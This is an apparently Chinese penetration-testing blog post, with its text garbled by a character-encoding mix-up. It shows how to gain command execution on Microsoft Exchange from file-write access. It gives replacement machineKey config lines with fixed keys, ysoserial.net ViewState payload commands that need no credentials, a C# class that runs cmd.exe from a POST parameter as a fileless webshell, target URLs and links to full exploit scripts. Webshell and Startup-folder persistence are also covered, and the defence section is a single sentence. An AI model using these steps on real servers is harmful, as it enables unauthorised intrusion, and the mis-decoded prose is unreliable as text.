I"¨B<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>åœ¨å®é™…çš„æ¸—é€æµ‹è¯•è¿‡ç¨‹ä¸­ï¼Œæˆ‘ä»¬ä¼šé‡åˆ°å„ç§ä¸åŒçš„ç¯å¢ƒï¼Œä¾‹å¦‚è·å¾—äº†ExchangeæœåŠ¡å™¨çš„æ–‡ä»¶è¯»å†™æƒé™ï¼Œä½†æ˜¯æ— æ³•æ‰§è¡Œå‘½ä»¤ã€‚</p>

<p>æœ¬æ–‡å°†è¦æä¾›ä¸€ç§å®ç°æ–¹æ³•ï¼Œåˆ†æåˆ©ç”¨æ€è·¯ï¼Œä»‹ç»è„šæœ¬å¼€å‘çš„ç»†èŠ‚ï¼Œç»™å‡ºé˜²å¾¡å»ºè®®ã€‚</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>è§£å†³æ€è·¯</li>
  <li>åˆ©ç”¨æ–¹æ³•</li>
  <li>ç¨‹åºå®ç°</li>
  <li>é˜²å¾¡å»ºè®®</li>
</ul>

<h2 id="0x02-è§£å†³æ€è·¯">0x02 è§£å†³æ€è·¯</h2>
<hr />

<h3 id="1å¸¸è§„è§£å†³æ€è·¯">1.å¸¸è§„è§£å†³æ€è·¯</h3>

<p>(1)å†™å…¥Webshell</p>

<p>é€šå¸¸é€‰æ‹©ä»¥ä¸‹ä¸¤ä¸ªä½ç½®ï¼š</p>

<ul>
  <li>%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth</li>
  <li>%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth</li>
</ul>

<p>é€‰æ‹©è¿™ä¸¤ä¸ªä½ç½®çš„ä¼˜ç‚¹æ˜¯å¯ä»¥ç›´æ¥è®¿é—®Webshell</p>

<p>ä¹Ÿå¯ä»¥é€‰æ‹©å…¶ä»–ä½ç½®ï¼Œä¾‹å¦‚<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\ClientAccess\ecp\</code>ï¼Œå†™å…¥çš„æ–‡ä»¶åç§°æœ‰é™åˆ¶ï¼Œå‘½ä»¤è§„åˆ™å¯å‚è€ƒ<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\ClientAccess\ecp\web.config</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>è®¿é—®<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\ClientAccess\</code>ä¸‹çš„webshelléœ€è¦æ·»åŠ åˆæ³•ç”¨æˆ·çš„ç™»å½•Cookie</p>

<p>æ€»çš„æ¥è¯´ï¼Œé€šè¿‡å†™å…¥Webshellçš„æ–¹å¼æ¯”è¾ƒç›´æ¥ï¼Œä½†æ˜¯ExchangeæœåŠ¡å™¨æœ‰å¯èƒ½ç¦ç”¨äº†å‘½ä»¤æ‰§è¡Œæƒé™æˆ–æ˜¯æ‹¦æˆªç³»ç»Ÿå‡½æ•°çš„è°ƒç”¨ï¼Œä¾æ—§æ— æ³•è·å¾—å‘½ä»¤æ‰§è¡Œæƒé™ã€‚</p>

<p>(2)å†™å…¥PEæ–‡ä»¶</p>

<p>å†™å…¥exeæ–‡ä»¶ï¼Œå¯é€‰æ‹©ä»¥ä¸‹ä¸¤ç§å¯åŠ¨æ–‡ä»¶å¤¹ï¼š</p>

<ul>
  <li>
    <p>ç³»ç»Ÿå¯åŠ¨æ–‡ä»¶å¤¹çš„ä½ç½®ï¼š<code class="language-plaintext highlighter-rouge">%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup</code></p>
  </li>
  <li>
    <p>ç”¨æˆ·å¯åŠ¨æ–‡ä»¶å¤¹çš„ä½ç½®ï¼š<code class="language-plaintext highlighter-rouge">%USERPROFILE%\Appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code></p>
  </li>
</ul>

<p>å†™å…¥dllæ–‡ä»¶ï¼Œå¯é€‰æ‹©ç³»ç»Ÿå¸¸è§çš„dllåŠ«æŒä½ç½®ï¼Œä¾‹å¦‚<code class="language-plaintext highlighter-rouge">c:\Windows\System32\fxsst.dll</code>ï¼Œæ›´å¤šç»†èŠ‚å¯å‚è€ƒï¼šhttps://github.com/3gstudent/Pentest-and-Development-Tips/blob/master/README-en.md#method-16-windows-fax-dll-injection</p>

<p>æ€»çš„æ¥è¯´ï¼Œé€šè¿‡å†™å…¥PEæ–‡ä»¶çš„æ–¹å¼æ¯”è¾ƒè¢«åŠ¨ï¼Œéœ€è¦ç­‰å¾…ç³»ç»ŸåŠ è½½ï¼Œæ— æ³•åšåˆ°å®æ—¶çš„å‘½ä»¤æ‰§è¡Œ</p>

<h3 id="2æœ‰æ•ˆçš„è§£å†³æ€è·¯">2.æœ‰æ•ˆçš„è§£å†³æ€è·¯</h3>

<p>ä¿®æ”¹Exchangeé…ç½®ï¼Œè®¾ç½®MachineKeyï¼Œé€šè¿‡.Netååºåˆ—åŒ–å®ç°å‘½ä»¤æ‰§è¡Œ</p>

<p>å¯ä¾›å­¦ä¹ çš„èµ„æ–™ï¼š</p>

<p>http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html</p>

<p>https://blog.knownsec.com/2020/11/net-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e4%b9%8b-viewstate-%e5%88%a9%e7%94%a8/</p>

<p>ç®€å•æ¥è¯´ï¼Œæˆ‘ä»¬é€šè¿‡è®¾ç½®MachineKeyï¼Œå°±èƒ½å¤Ÿå®ç°ä¸CVE-2020-0688åŒæ ·çš„æ•ˆæœï¼Œä¹Ÿå°±æ˜¯è¯´ï¼Œè®¾ç½®MachineKeyä¸ºé»˜è®¤å€¼åï¼Œå¯ä»¥ç›´æ¥ä½¿ç”¨CVE-2020-0688çš„åˆ©ç”¨å·¥å…·å®ç°å‘½ä»¤æ‰§è¡Œ</p>

<h2 id="0x03-åˆ©ç”¨æ–¹æ³•">0x03 åˆ©ç”¨æ–¹æ³•</h2>
<hr />

<p>1.ä¿®æ”¹%ExchangeInstallPath%\ClientAccess\ecp\web.config</p>

<p>å°†<code class="language-plaintext highlighter-rouge">&lt;machineKey validationKey="AutoGenerate,IsolateApps" /&gt;</code>ä¿®æ”¹ä¸º<code class="language-plaintext highlighter-rouge">&lt;machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" /&gt;</code></p>

<p>å¦‚æœæ²¡æœ‰è¿™ä¸€å±æ€§ï¼Œé‚£ä¹ˆå°±åœ¨<code class="language-plaintext highlighter-rouge">system.web</code>ä¸‹æ·»åŠ <code class="language-plaintext highlighter-rouge">&lt;machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" /&gt;</code></p>

<p>æ¥ä¸‹æ¥å°±å¯ä»¥ç›´æ¥ä½¿ç”¨CVE-2020-0688çš„åˆ©ç”¨å·¥å…·ï¼Œæˆç†Ÿçš„åˆ©ç”¨å·¥å…·å¯é€‰æ‹©ï¼šhttps://github.com/zcgonvh/CVE-2020-0688/ï¼Œç›¸æ¯”å…¶å®ƒå·²å¼€æºçš„åˆ©ç”¨å·¥å…·ï¼Œè¿™æ¬¾å·¥å…·èƒ½å¤Ÿå®æ—¶è·å¾—å‘½ä»¤æ‰§è¡Œç»“æœï¼Œä¹Ÿæ”¯æŒåŠ è½½shellcodeçš„åŠŸèƒ½ï¼Œå…¶ä¸­çš„æŠ€æœ¯ç»†èŠ‚å€¼å¾—æ·±å…¥ç ”ç©¶</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>CVE-2020-0688çš„åˆ©ç”¨å·¥å…·å¤§éƒ½å€ŸåŠ©<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„TextFormattingRunPropertieså®ç°å‘½ä»¤æ‰§è¡Œï¼Œæ— æ³•å®æ—¶è·å¾—å‘½ä»¤æ‰§è¡Œç»“æœ</p>

<p>ysoserial.net-1.32çš„ActivitySurrogateSelectorFromFileèƒ½å¤Ÿé€šè¿‡Assembly.LoadåŠ è½½.Netç¨‹åºé›†å®ç°è¿”å›å‘½ä»¤æ‰§è¡Œçš„ç»“æœï¼Œä½†æ˜¯å…¼å®¹æ€§ä¸å¤Ÿï¼Œæ— æ³•åšåˆ°æ”¯æŒæ‰€æœ‰ç‰ˆæœ¬çš„.Netç¯å¢ƒ</p>

<p>zcgonvhå¼€æºçš„<a href="https://github.com/zcgonvh/CVE-2020-0688/">CVE-2020-0688åˆ©ç”¨å·¥å…·</a>è§£å†³äº†ysoserial.net-1.32ä¸­ActivitySurrogateSelectorFromFileå…¼å®¹æ€§çš„é—®é¢˜ï¼ŒåŒæ—¶å¯¹é€šä¿¡æ•°æ®åšäº†AESåŠ å¯†</p>

<p>ysoserial.net-1.33ä¿®å¤äº†ActivitySurrogateSelectorFromFileå…¼å®¹æ€§çš„bugï¼Œ<a href="https://github.com/pwntester/ysoserial.net/pull/63">bugç”±zcgonvhä¿®å¤</a></p>

<p>æˆ‘ä»¬çŸ¥é“ï¼ŒCVE-2020-0688çš„åˆ©ç”¨å‰ææ˜¯éœ€è¦æŒæ¡ä¸€ä¸ªåˆæ³•ç”¨æˆ·çš„å‡­æ®ï¼Œè€Œæˆ‘ä»¬åªè·å¾—äº†ExchangeæœåŠ¡å™¨çš„æ–‡ä»¶è¯»å†™æƒé™ï¼Œè¿˜æ— æ³•ç«‹å³è·å¾—åˆæ³•ç”¨æˆ·çš„å‡­æ®ï¼Œè¿™é‡Œå¯ä»¥ä½¿ç”¨æ¥ä¸‹æ¥çš„ä¸¤ç§æ–¹æ³•ç»•è¿‡è¿™ä¸ªé™åˆ¶</p>

<p>(1)ä¿®æ”¹<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config</code></p>

<p>å°†<code class="language-plaintext highlighter-rouge">&lt;machineKey validationKey="AutoGenerate,IsolateApps" /&gt;</code>ä¿®æ”¹ä¸º<code class="language-plaintext highlighter-rouge">&lt;machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" /&gt;</code></p>

<p>è¿™é‡ŒvalidationKeyå’ŒdecryptionKeyå¯ä»¥ä»»æ„æŒ‡å®šï¼Œå­—ç¬¦èŒƒå›´ä¸ºåå…­è¿›åˆ¶ï¼Œå³0~F</p>

<p>ä¹Ÿå¯ä»¥é€‰ç”¨ä»¥ä¸‹ç®—æ³•ï¼š</p>

<ul>
  <li>MD5</li>
  <li>AES</li>
  <li>HMACSHA256</li>
  <li>HMACSHA384</li>
  <li>HMACSHA512</li>
</ul>

<p>å¯†é’¥é•¿åº¦éœ€è¦ç¬¦åˆç®—æ³•è¦æ±‚ï¼Œå­¦ä¹ èµ„æ–™ï¼š</p>

<p>https://devblogs.microsoft.com/aspnet/cryptographic-improvements-in-asp-net-4-5-pt-1/</p>

<p>(2)ä¿®æ”¹<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config</code></p>

<p>æ–¹æ³•åŒä¸Š</p>

<p>å¯¹äºè¿™ä¸¤ä¸ªä½ç½®çš„.Netååºåˆ—åŒ–å‘½ä»¤æ‰§è¡Œï¼Œä¸å†éœ€è¦åˆæ³•ç”¨æˆ·çš„å‡­æ®ï¼Œæ‰€ä»¥åˆ©ç”¨ç¨‹åºä¹Ÿéœ€è¦åšä¿®æ”¹ã€‚ä¸‹é¢ä»‹ç»ä¸‰ç§åˆ©ç”¨ç¨‹åºå®ç°çš„ç»†èŠ‚</p>

<h2 id="0x04-å®ç°ç»†èŠ‚">0x04 å®ç°ç»†èŠ‚</h2>
<hr />

<h3 id="1è®¡ç®—viewstategeneratorçš„ä¸¤ç§æ–¹æ³•">1.è®¡ç®—VIEWSTATEGENERATORçš„ä¸¤ç§æ–¹æ³•</h3>

<p>Exchangeçš„.Netååºåˆ—åŒ–ç”¨çš„æ˜¯ViewStateï¼Œå…¶ä¸­å¿…å¤‡çš„å‚æ•°ä¸ºVIEWSTATEGENERATORï¼Œä¾‹å¦‚Pythonå®ç°çš„<a href="https://github.com/Ridter/cve-2020-0688/blob/master/cve-2020-0688.py#L46">CVE-2020-0688åˆ©ç”¨å·¥å…·</a>ä¸­ä½¿ç”¨çš„é»˜è®¤VIEWSTATEGENERATORä¸º<code class="language-plaintext highlighter-rouge">B97B4E27</code>ï¼Œè¡¨ç¤ºçš„é¡µé¢ä¸º<code class="language-plaintext highlighter-rouge">ecp/default.aspx</code>ï¼Œå¯¹åº”çš„<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„å‚æ•°ä¸º<code class="language-plaintext highlighter-rouge">--path="/ecp/default.aspx" --apppath="/ecp/"</code></p>

<p>ä¸‹é¢ä»‹ç»ä¸¤ç§è®¡ç®—VIEWSTATEGENERATORçš„æ–¹æ³•ï¼š</p>

<p>C#å®ç°çš„ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System;
class a
{
    static void Main(string[] args)
    {
        int hashcode = StringComparer.InvariantCultureIgnoreCase.GetHashCode("/ecp");
	uint _clientstateid=(uint)(hashcode
+StringComparer.InvariantCultureIgnoreCase.GetHashCode("default_aspx"));
Console.WriteLine(_clientstateid.ToString("X2"));
    }
}
</code></pre></div></div>

<p>å¾—å‡ºç»“æœä¸ºB97B4E27</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>ä»£ç æ¥è‡ªhttp://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html</p>

<p>ä¹Ÿå¯ä»¥é€šè¿‡ç½‘é¡µè‡ªåŠ¨è®¡ç®—ï¼Œæ–¹æ³•å¦‚ä¸‹ï¼š</p>

<p>åœ¨å®é™…æµ‹è¯•ç¯å¢ƒä¸­ï¼Œä¿®æ”¹ecp/default.aspxçš„å†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;!DOCTYPE HTML&gt;
&lt;html&gt;
&lt;body&gt;
    &lt;form runat="server"&gt;
    &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre></div></div>

<p>é€šè¿‡æµè§ˆå™¨è®¿é—®è¯¥é¡µé¢ï¼Œè¿”å›ç»“æœä¸­çš„__VIEWSTATEGENERATORå³ä¸ºè®¡ç®—åçš„ç»“æœ</p>

<h3 id="2ä¸éœ€è¦åˆæ³•ç”¨æˆ·å‡­æ®çš„ä¸‰ç§ååºåˆ—åŒ–ç¨‹åºå®ç°">2.ä¸éœ€è¦åˆæ³•ç”¨æˆ·å‡­æ®çš„ä¸‰ç§ååºåˆ—åŒ–ç¨‹åºå®ç°</h3>

<p>(1)å€ŸåŠ©<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„TextFormattingRunPropertieså®ç°å‘½ä»¤æ‰§è¡Œçš„Pythonä»£ç </p>

<p>CVE-2020-0688ä¸­å¯¹åº”ysoserial.netçš„å‚æ•°æ ¼å¼å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{generator}" --viewstateuserkey="{}"
</code></pre></div></div>

<p>ç”±äºæˆ‘ä»¬çš„åˆ©ç”¨ä¸éœ€è¦åˆæ³•ç”¨æˆ·çš„å‡­æ®ï¼Œæ–°çš„ysoserial.netå‚æ•°æ ¼å¼ä¸ºï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"
</code></pre></div></div>

<p>å‚æ•°è¯´æ˜å¦‚ä¸‹ï¼š</p>

<ul>
  <li>{command}å¯¹åº”æˆ‘ä»¬è¦æ‰§è¡Œçš„å‘½ä»¤</li>
  <li>{key}å¯¹åº”æˆ‘ä»¬è®¾ç½®çš„validationKey</li>
  <li>{generator}å¯¹åº”è¦è®¿é—®é¡µé¢çš„VIEWSTATEGENERATOR</li>
</ul>

<p>å€ŸåŠ©<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„TextFormattingRunPropertiesç”Ÿæˆæœ€ç»ˆçš„VIEWSTATEæ•°æ®åï¼Œæ‹¼æ¥æˆä»¥ä¸‹æ ¼å¼ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://{url}?__VIEWSTATEGENERATOR={generator}&amp;__VIEWSTATE={out_payload}
</code></pre></div></div>

<p>å‘é€GETæ•°æ®åŒ…å³å¯</p>

<p>ä¸‹é¢ä¸¾ä¾‹è¿›è¡Œè¯´æ˜ï¼š</p>

<p>é€‰æ‹©Exchangeé»˜è®¤çš„é”™è¯¯é¡µé¢ï¼š<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx</code></p>

<p><code class="language-plaintext highlighter-rouge">owa\auth\errorFE.aspx</code>å¯¹åº”çš„VIEWSTATEGENERATORä¸º<code class="language-plaintext highlighter-rouge">042A94E8</code></p>

<p>å€ŸåŠ©<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„TextFormattingRunPropertiesç”Ÿæˆæœ€ç»ˆçš„VIEWSTATEæ•°æ®</p>

<p>æœ€ç»ˆè®¿é—®çš„URLä¸ºï¼š<code class="language-plaintext highlighter-rouge">https://&lt;ip&gt;/owa/auth/errorFE.aspx?__VIEWSTATEGENERATOR=042A94E8&amp;__VIEWSTATE={out_payload}</code></p>

<p>å®Œæ•´çš„å®ç°ä»£ç å·²ä¸Šä¼ è‡³githubï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py</p>

<p>ä»£ç æ”¯æŒä¸¤ä¸ªä½ç½®çš„ååºåˆ—åŒ–æ‰§è¡Œï¼Œåˆ†åˆ«ä¸ºé»˜è®¤å­˜åœ¨çš„æ–‡ä»¶<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx</code>å’Œ<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>ç”±äºæˆ‘ä»¬å·²è·å¾—äº†ExchangeæœåŠ¡å™¨çš„æ–‡ä»¶è¯»å†™æƒé™ï¼Œè¿™é‡Œå¯ä»¥å°†ä»£ç ç»“æœè¾“å‡ºè‡³æŒ‡å®šæ–‡ä»¶è¿›è¡ŒæŸ¥çœ‹ï¼Œå‘½ä»¤ç¤ºä¾‹ï¼š<code class="language-plaintext highlighter-rouge">net user /domain &gt;c:\test.txt</code></p>

<p>(2)å€ŸåŠ©<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„ActivitySurrogateSelectorFromFileå®ç°å‘½ä»¤æ‰§è¡Œå¹¶è¿”å›æ‰§è¡Œç»“æœçš„Pythonä»£ç </p>

<p>è¿™é‡Œä½¿ç”¨ysoserial.netçš„ç‰ˆæœ¬éœ€è¦é«˜äº1.32ï¼Œä»¥é¿å…ActivitySurrogateSelectorFromFileå…¼å®¹æ€§çš„bug</p>

<p>æ–°å»ºæ–‡ä»¶ExploitClass.csï¼Œå†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>class E
{
    public E()
    {
        System.Web.HttpContext context = System.Web.HttpContext.Current;
        context.Server.ClearError();
        context.Response.Clear();
        try
        {
            System.Diagnostics.Process process = new System.Diagnostics.Process();
            process.StartInfo.FileName = "cmd.exe";
            string cmd = context.Request.Form["cmd"];
            process.StartInfo.Arguments = "/c " + cmd;
            process.StartInfo.RedirectStandardOutput = true;
            process.StartInfo.RedirectStandardError = true;
            process.StartInfo.UseShellExecute = false;
            process.Start();
            string output = process.StandardOutput.ReadToEnd();
            context.Response.Write(output);
        } catch (System.Exception) {}
        context.Response.Flush();
        context.Response.End();
    }
}
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>ä»£ç å¼•ç”¨è‡ªhttps://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/</p>

<p>æ›´å¤šç”¨æ³•å¯å‚è€ƒhttps://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/ExploitClass.cs</p>

<p>ysoserial.netçš„å‚æ•°æ ¼å¼å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;System.Web.dll;System.dll;" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}
</code></pre></div></div>

<p>å€ŸåŠ©<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>çš„ActivitySurrogateSelectorFromFileç”Ÿæˆæœ€ç»ˆçš„VIEWSTATEæ•°æ®åï¼Œæ„é€ POSTæ•°æ®åŒ…ï¼Œæ·»åŠ åä¸ºcmdçš„å‚æ•°ï¼Œå‚æ•°å€¼ä¸ºè¦æ‰§è¡Œçš„å‘½ä»¤</p>

<p>é«˜ç‰ˆæœ¬çš„.NET Frameworkä¼šç¦æ­¢ActivitySurrogateSelectorï¼Œå¯å€ŸåŠ©<a href="https://github.com/pwntester/ysoserial.net">ysoserial.net</a>ActivitySurrogateDisableTypeCheckè¿›è¡Œç»•è¿‡ï¼Œå¯¹åº”çš„å‚æ•°æ ¼å¼å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck -c "ignore" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"
</code></pre></div></div>

<p>å®Œæ•´çš„å®ç°ä»£ç å·²ä¸Šä¼ è‡³githubï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py</p>

<p>ä»£ç æ”¯æŒä¸¤ä¸ªä½ç½®çš„ååºåˆ—åŒ–æ‰§è¡Œï¼Œåˆ†åˆ«ä¸ºé»˜è®¤å­˜åœ¨çš„æ–‡ä»¶<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx</code>å’Œ<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx</code></p>

<p>ä»£ç èƒ½å¤Ÿæ‰§è¡Œå‘½ä»¤å¹¶è·å¾—å‘½ä»¤æ‰§è¡Œçš„ç»“æœï¼Œé€šè¿‡POSTæ–¹å¼ä»¥å‚æ•°__Valueå‘é€æ•°æ®ï¼Œé€šä¿¡æ•°æ®é‡‡ç”¨é€å­—ç¬¦å¼‚æˆ–åŠ å¯†</p>

<p>(3)åŸºäºhttps://github.com/zcgonvh/CVE-2020-0688/å®ç°æ— å‡­æ®åˆ©ç”¨çš„C#ä»£ç </p>

<p>VIEWSTATEæ•°æ®çš„ç”Ÿæˆè¿‡ç¨‹åŒhttps://github.com/zcgonvh/CVE-2020-0688/ä¿æŒä¸€è‡´ï¼Œåªéœ€è¦å°†validationkeyä½œä¸ºå˜é‡ä¼ å…¥å³å¯</p>

<p><code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config</code>å’Œ<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config</code>å‡æ²¡æœ‰é™åˆ¶POSTè¯·æ±‚ï¼Œæ‰€ä»¥åœ¨åˆ©ç”¨ä¸Šä¸å†éœ€è¦å†™å…¥ç©ºæ–‡ä»¶ï¼Œå¯ä»¥ç›´æ¥ç”Ÿæˆæœ€ç»ˆçš„VIEWSTATEæ•°æ®å¹¶é€šè¿‡POSTçš„æ–¹å¼å‘é€æ•°æ®</p>

<p>å®Œæ•´çš„å®ç°ä»£ç å·²ä¸Šä¼ è‡³githubï¼Œåœ°å€å¦‚ä¸‹ï¼š</p>

<p>https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs</p>

<p>ä»£ç æ”¯æŒä¸¤ä¸ªä½ç½®çš„ååºåˆ—åŒ–æ‰§è¡Œï¼Œåˆ†åˆ«ä¸ºé»˜è®¤å­˜åœ¨çš„æ–‡ä»¶<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx</code>å’Œ<code class="language-plaintext highlighter-rouge">%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx</code></p>

<p>æ”¯æŒçš„åŠŸèƒ½åŒhttps://github.com/zcgonvh/CVE-2020-0688/ä¿æŒä¸€è‡´</p>

<h2 id="0x05-é˜²å¾¡æ£€æµ‹">0x05 é˜²å¾¡æ£€æµ‹</h2>
<hr />

<p>åœ¨ExchangeæœåŠ¡å™¨è¢«å…¥ä¾µåï¼Œä¸ä»…éœ€è¦æŸ¥æ€æœ‰æ— å¯ç–‘çš„Webshellï¼ŒåŒæ ·éœ€è¦åˆ¤æ–­web.configä¸­çš„machineKeyæ˜¯å¦è¢«ä¿®æ”¹</p>

<h2 id="0x06-å°ç»“">0x06 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡æä¾›äº†ä¸€ç§ä»Exchangeæ–‡ä»¶è¯»å†™æƒé™åˆ°å‘½ä»¤æ‰§è¡Œçš„å®ç°æ–¹æ³•ï¼Œåˆ†æåˆ©ç”¨æ€è·¯ï¼Œä»‹ç»ä¸‰ç§åˆ©ç”¨è„šæœ¬çš„å¼€å‘ç»†èŠ‚ï¼Œç»™å‡ºé˜²å¾¡å»ºè®®ã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET